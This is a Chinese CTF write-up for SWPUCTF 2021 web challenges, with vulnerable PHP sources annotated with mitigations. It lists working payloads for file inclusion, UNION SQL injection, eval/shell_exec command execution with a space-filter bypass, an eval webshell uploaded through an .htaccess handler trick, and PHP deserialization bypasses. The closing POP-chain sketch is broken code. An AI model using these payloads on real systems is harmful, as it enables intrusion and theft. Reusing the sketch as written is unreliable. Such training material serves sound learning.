SWPUCTF 2021


include

根据提示传一个file试试 /?file=1

 <?php
// Challenge source (SWPUCTF 2021 "include"), reproduced as printed by show_source().
// Comments annotate the weaknesses the challenge demonstrates.
ini_set("allow_url_include","on"); // permits include of remote URLs and stream wrappers; this is off by default and should stay off
header("Content-type: text/html; charset=utf-8");
error_reporting(0); // hides the warnings a failed or empty include would otherwise emit
$file=$_GET['file']; // taken straight from the query string; never validated against an allow-list
if(isset($file)){
show_source(__FILE__);
echo 'flag 在flag.php中';
}else{
echo "传入一个file试试";
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
// File-inclusion sink: the isset() above only guards the echo, so this include runs
// with whatever path (or wrapper URL) the client supplied. Mitigation: resolve a fixed
// set of names to server-side paths instead of including user input.
include_once($file);
?> flag 在flag.php中

利用php伪协议来读取文件。php伪协议(流封装协议)常见的有 http://、https://、php://、file://、phar://、zip://、bzip2://、zlib://、data:// 等
这题利用?file=php://filter/read=convert.base64-encode/resource=flag.php (读取php文件要base64编码)

gift_F12

F12 注释里面有flag = "WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}"//flag is here

jicao

<?php
// Challenge source (SWPUCTF 2021 "jicao"): two loosely compared request values gate $flag.
highlight_file('index.php');
include("flag.php"); // presumably defines $flag; not visible here
$id=$_POST['id'];
$json=json_decode($_GET['json'],true); // decode the JSON into an associative array (second argument true)
if ($id=="wllmNB"&&$json['x']=="wllm") // both comparisons are loose (==); $json['x'] reads a key of the decoded array
{echo $flag;}
?>

以post,传入id=wllmNB get传入?json={"x":"wllm"}

easy_md5

 <?php 
// Challenge source (SWPUCTF 2021 "easy_md5"): a password check built on loose comparison.
highlight_file(__FILE__);
include 'flag2.php'; // presumably defines $flag; not visible here

if (isset($_GET['name']) && isset($_POST['password'])){
$name = $_GET['name'];
$password = $_POST['password'];
// Both comparisons are loose (!= and ==). Under == two md5 hex strings of the form
// "0e<digits>" compare as equal numerics, and on PHP < 8 md5() of an array returns null
// (PHP 8 throws TypeError instead). Neither input is required to be a string.
// Mitigation: require strings and compare digests with hash_equals() or ===.
if ($name != $password && md5($name) == md5($password)){
echo $flag;
}
else {
echo "wrong!";
}

}
else {
echo 'wrong!';
}
?>
wrong!

弱比较,可以用0e绕过或数组绕过(md5无法处理数组,返回NULL)
GET ?name[]=1
POST password[]=2

easy_sql

传参为wllm

1.  ?wllm=1'  //判断注入点
2. ?wllm=1' order by 3-- + //判断字段数
3. ?wllm=-1' union select 1,2,3-- + //回显点
4. ?wllm=-1' union select 1,2,database()-- + //查库名 test_db
5. ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test.db'-- + //查表名 test_tb,users
6. ?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' and table_schema='test_db'-- + //查字段名 id,flag
7. ?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb //获得flag

caidao

蚁剑连一下

Do_you_know_http

用bp修改请求头
Please use 'WLLM' browser! User-Agent: WLLM
You can only read this at local!<br>Your address175.42.87.177 //只能在本地读取
xff X-Forwarded-For:127.0.0.1 获得flag

easyrce

 <?php
// Challenge source (SWPUCTF 2021 "easyrce"): the query parameter is executed as PHP code.
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
// eval() on request input is arbitrary code execution; no filter makes this safe.
// Mitigation: remove eval entirely and dispatch on an allow-list of actions.
eval($_GET['url']);
}
?>

eval 把字符串作为PHP代码执行
PHP执行系统命令的有几个常用的函数,如:system函数、exec函数、popen函数、passthru、shell_exec函数等 详见
?system('ls /') bin boot dev etc flllllaaaaaaggggggg home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
?system('cat /flag')

easyupload1.0

上传.jpg,然后bp里面修改文件名为.php
<?php @eval ($_GET['cmd']);?>
./upload/cmd.php succesfully uploaded!
蚁剑怎么连不了?换一个
<?php phpinfo();?>
上传完直接访问路径 /upload/cmd.php
F12查找CTF{ 获得NSSCTF{ec814e35-b715-40c2-8f72-76f8efb8d677}

easyupload2.0

.php .php5 .htaccess这些都不行,利用.phtml上传成功,蚁剑还是连不了?
<?php phpinfo();?> 后续步骤跟上题一样

easyupload3.0

估计蚁剑还是不行喵,跟上面步骤一样,这次是.htaccess
.htaccess文件(或者分布式配置文件),全称是Hypertext Access(超文本入口)。 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。 作为用户,所能使用的命令受到限制。
大概就是同文件夹的文件都会被解析成.php
.htaccess内容为

<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch> //shell.jpg根据实际情况调换

接下来上传一个图片马

babyrce

 <?php
// Challenge source (SWPUCTF 2021 "babyrce"): an authorization decision based on a client-set cookie.
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) // $_COOKIE is the array of variables passed to the script via HTTP cookies; client-controlled and compared loosely (==)
{
include "../next.php"; // gated only by the cookie above; a server-side session/role check belongs here
}
else
echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

cookie editor加个name=admin,value=1
刷新页面rasalghul.php

 <?php
// Challenge source (SWPUCTF 2021 "babyrce", rasalghul.php): a one-character deny-list in front of shell_exec().
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0); // duplicate of the call above; harmless
if (isset($_GET['url'])) {
$ip=$_GET['url'];
// Rejects only a literal space character; this is a deny-list, and deny-lists do not
// make a shell call safe. Mitigation: avoid the shell (e.g. array-form proc_open with
// a fixed program) or escapeshellarg() each argument against an allow-list.
if(preg_match("/ /", $ip)){
die('nonono');
}
$a = shell_exec($ip); // shell_exec — run the command via the shell and return its complete output as a string
echo $a;
}
?>

?url=ls; 获得* -la 1.php 1.txt 1.txt 1.txt a.out abc.txt aflllllaaaaaaggggggg flllllaaaaaaggggggg index.php rasalghul.php a.out abc.txt aflllllaaaaaaggggggg flllllaaaaaaggggggg index.php rasalghul.php 1.txt a.out abc.txt aflllllaaaaaaggggggg flllllaaaaaaggggggg index.php rasalghul.php 2.txt a.out abc.txt aflllllaaaaaaggggggg con f* flag flllllaaaaaaggggggg index.php la rasalghul.php test test.php test.txt 怎么这么多喵?

学一只空格绕过喵
${IFS}代替空格
?url=cat${IFS}/flllllaaaaaaggggggg 获得flag

ez_unserialize

F12查看 User-agent: *Disallow: 什么东西呢? 搞不懂,先扫一下,扫出来cl45s.php

 <?php

// Challenge source (SWPUCTF 2021 "ez_unserialize", cl45s.php).
error_reporting(0);
show_source("cl45s.php");

class wllm{

public $admin;
public $passwd;

// The defaults are set only by the constructor; unserialize() does not call it and
// fills the properties directly from the payload.
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}

// Runs when the object is destroyed, including objects created by unserialize() at the
// bottom of the script, so this check is evaluated against attacker-chosen property values.
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "ctf"){
include("flag.php");
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo "Just a bit more!";
}
}
}

$p = $_GET['p'];
// unserialize() of untrusted input: object type and property values are attacker-chosen,
// and magic methods (__destruct here) run on the result.
// Mitigation: exchange data as JSON, or pass ['allowed_classes' => false].
unserialize($p);

?>

序列化格式为 对象类型:类名长度:"类名":属性个数:{属性类型:属性名长度:"属性名";属性类型:值长度:"值";......}
获得payload ?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

no_wakeup

 <?php

// Challenge source (SWPUCTF 2021 "no_wakeup", class.php).
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


public $admin;
public $passwd;

// Defaults set by the constructor only; unserialize() bypasses it.
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}

// Invoked by unserialize() after the properties are restored. Replacing passwd with
// its sha1 means the exact-match check in __destruct cannot pass on a PHP build where
// __wakeup is always honoured; the writeup relies on CVE-2016-7124 (property-count
// mismatch skips __wakeup on unpatched versions).
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}

// Runs on destruction of the unserialized object with attacker-chosen property values.
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}

$Letmeseesee = $_GET['p'];
// unserialize() of untrusted input; see the class above for the magic methods it triggers.
// Mitigation: JSON for data exchange, or ['allowed_classes' => false], plus a patched PHP.
unserialize($Letmeseesee);

?>

__wakeup() 使用unserialize时触发,反序列化恢复对象之前调用该方法
unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。
传入参数p,绕过__wakeup。绕过方法参考CVE-2016-7124:当序列化字符串中声明的属性个数大于真实属性个数时,__wakeup 不会被调用
原序列化O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";},直接输入会得到0e8badd4ad37ed18f5277e01c66b5b39bb1c28faNo wake up
修改一下O:6:"HaHaHa":4:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

PseudoProtocols

hint is hear Can you find out the hint.php?
读一下 php://filter/read=convert.base64-encode/source=hint.php

 <?php
// Challenge source (SWPUCTF 2021 "PseudoProtocols"): file_get_contents() on a client-chosen target.
ini_set("max_execution_time", "180"); // set the PHP script timeout to 180 seconds
show_source(__FILE__);
include('flag.php'); // presumably defines $flag; not visible here
$a= $_GET["a"];
// The path/URL comes from the query string, so any stream wrapper the server allows can
// be read. The second argument of file_get_contents() is use_include_path (bool); the
// string 'r' is coerced to true here. The content must equal 'I want flag' exactly (===).
// Mitigation: allow-list concrete paths; keep allow_url_fopen off.
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){ // a file whose content is `I want flag` must be supplied
echo "success\n";
echo $flag;
}
?>

?a=data://text/plain;base64,***(I want flag的加密后)

pop

  <?php

// Challenge source (SWPUCTF 2021 "pop", index.php): a property-oriented-programming chain.
error_reporting(0);
show_source("index.php");

class w44m{

// Visibility is not a defence here: unserialize() restores private and protected
// properties from the payload just like public ones.
private $admin = 'aaa';
protected $passwd = '123456';

// Never called directly in this file; reachable only through the dynamic method call
// in w33m::__toString() below.
public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php');
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}

class w22m{
public $w00m;
// Chain entry point: runs on destruction of an unserialized object. echo of an object
// invokes its __toString(), which is how control reaches w33m below.
public function __destruct(){
echo $this->w00m;
}
}

class w33m{
public $w00m;
public $w22m;
// Both the target object ($w00m) and the method name ($w22m) are properties, i.e.
// attacker-chosen after unserialize(): this is an arbitrary method call gadget.
// NOTE(review): __toString() returns int 0 rather than a string; on PHP 8 this is
// coerced to "0", on older versions it is an error — by then the call above has run.
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}

$w00m = $_GET['w00m'];
// unserialize() of untrusted input with gadget classes loaded in the same file.
// Mitigation: JSON for data exchange, or ['allowed_classes' => false].
unserialize($w00m);

?>

w00m->w22m->w33m->w44m

<?php
// Writeup's payload-construction sketch for the "pop" challenge above. It mirrors the
// chain the writeup names (w00m -> w22m -> w33m -> w44m): w22m::__destruct echoes w00m,
// that reaches w33m::__toString, which calls the method named by $w22m on $w00m.
// NOTE(review): reproduced as printed; the listing is not syntactically valid PHP as it
// stands (unmatched `}` after the w22m and w33m bodies).
class w44m{

private $admin = 'w44m';
protected $passwd = '08067';
}

class w22m{
public $w00m;

}
}

class w33m{
public $w00m;
public $w22m=Getflag;

}
}
$a=new w22m;
$b=new w33m;
$b->w00m=$w44m;
$a->w00m=$b;
echo unserialize($a);
?>